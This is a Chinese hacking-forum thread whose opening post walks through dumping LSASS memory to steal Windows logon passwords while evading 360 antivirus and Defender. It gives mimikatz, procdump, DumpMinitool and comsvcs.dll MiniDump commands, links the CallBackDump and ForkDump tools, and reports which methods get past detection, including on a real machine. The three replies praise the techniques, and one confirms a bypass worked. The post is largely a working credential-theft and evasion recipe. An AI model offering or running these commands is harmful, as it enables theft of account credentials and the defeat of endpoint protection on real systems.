查看: 23056|回复: 3

绕360核晶?Easy!

[复制链接]
发表于 2022-10-24 10:27:35 | 显示全部楼层 |阅读模式
测试环境:

虚拟机:Windows Server 2012 ,腾讯云 Windows Server 2019

均安装360和defender。

1. mimikatz

未做免杀处理
[AppleScript] 查看源码 复制代码
mimikatz.exe "sekurlsa::debug" "sekurlsa::logonPasswordsfull" >>1.txtexit

qw1.jpg
被360拦截

2. 白名单文件

procdump/sqldumper/createdump/DumpMinitool/AvDump/Dump64

虽然都有白名单,但都过不了行为检测。

以prodump和DumpMinitool为例
[AppleScript] 查看源码 复制代码
procdump-accepteula-malsass.exelsass.DMP
DumpMinitool.exe --file 1.txt --processId 980 --dumpType Full


但都会被360拦截

qw2.jpg

qw3.jpg

3. 任务管理器右键dump内存

qw4.jpg
此操作不会拦截

接下来mimikatz导入即可。
[AppleScript] 查看源码 复制代码
mimikatz.exe "sekurlsa::minidumplsass.DMP" "sekurlsa::logonPasswordsfull" exit


4. rundl132.dll
[AppleScript] 查看源码 复制代码
powershell-c "rundll32C:\windows\system32\comsvcs.dll, MiniDumppidC:\test\lsass.dmpfull"


qw5.jpg
rundl132.dll被拦截

5. CallBackDump

下载地址:https://github.com/seventeenman/CallBackDump

目前过360,defender等

使用命令:
[AppleScript] 查看源码 复制代码
CallBackDump.exe to


qw6.jpg
再使用dumpXor.exe解密
[AppleScript] 查看源码 复制代码
dumpXor.exe VM21-6-8.log 1.bin


qw7.jpg

[AppleScript] 查看源码 复制代码
mimikatz.exe "sekurlsa::minidump 1.bin" "sekurlsa::logonPasswordsfull" >> 1.txtexit


qw8.jpg

360无感。

虚拟机核晶模式下导出失败。

qw9.jpg

qw10.jpg

CS插件地址:

https://github.com/0x3rhy/CallBackDump-CS

6. ForkDump

下载链接:https://github.com/D4stiny/ForkPlayground/releases/tag/1.0.0

使用方法:
[AppleScript] 查看源码 复制代码
ForkDump.exe[dump file name][target process Id]


qw11.jpg

[AppleScript] 查看源码 复制代码
mimikatz.exe "sekurlsa::minidumpfork.dmp" "sekurlsa::logonPasswordsfull" >> fork.txtexit

qw12.jpg

360无感。

虚拟机核晶模式导出成功。

qw13.jpg

qw14.jpg
360核晶实机测试

测试机器:Windows 10

qw15.jpg

qw16.jpg

Dump成功。

参考链接

https://www.t00ls.com/articles-66489.html

https://mp.weixin.qq.com/s/vABhX-ajrOa01cZIGWLIDg

https://mp.weixin.qq.com/s/67SghGobegFUC2td3az5qQ

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass


回复

使用道具 举报

发表于 2026-5-22 00:15:00 | 显示全部楼层

Re: 绕360核晶?Easy!

感谢楼主的详细测试分享!把这么多绕过360核晶的方法都跑了一遍,还记录了成功/失败的环境,非常实用。特别是CallBackDump和ForkDump在实机核晶模式下能成功Dump,对做渗透测试和红队工作的兄弟应该很有参考价值。想请教一下,在实机测试时360的CPU占用或日志告警方面有异常吗?另外任务管理器右键Dump虽然简单,但实际操作中是否容易被管理员发现?期待更多这类实测对比。
回复 支持 反对

使用道具 举报

发表于 2026-6-19 00:20:01 | 显示全部楼层

Re: 绕360核晶?Easy!

很实用的技术分享,感谢楼主系统性地测试了多种绕过360核晶的方法。对任务管理器右键 dump 和 CallBackDump、ForkDump 这两种工具的效果尤其感兴趣,实机测试也能成功,说明隐蔽性确实不错。请问在核晶模式下,除了工具本身免杀外,是否还需要注意一些执行时的环境细节(比如以管理员身份运行、关闭某些防护模块)?
回复 支持 反对

使用道具 举报

发表于 2026-6-19 09:15:00 | 显示全部楼层

Re: 绕360核晶?Easy!

感谢分享!很实用的技术总结,把常见的几种绕过360核晶的方法都列出来了,特别是CallBackDump和ForkDump在实机测试中也能成功,参考价值很高。刚试了下任务管理器右键dump配合mimikatz导入的方法,确实360没有拦截,操作也比较简单,适合快速过杀软。另外ForkDump能过核晶模式这点挺惊喜的,回头再详细测一下。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-7 07:38 , Processed in 0.034810 second(s), 22 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部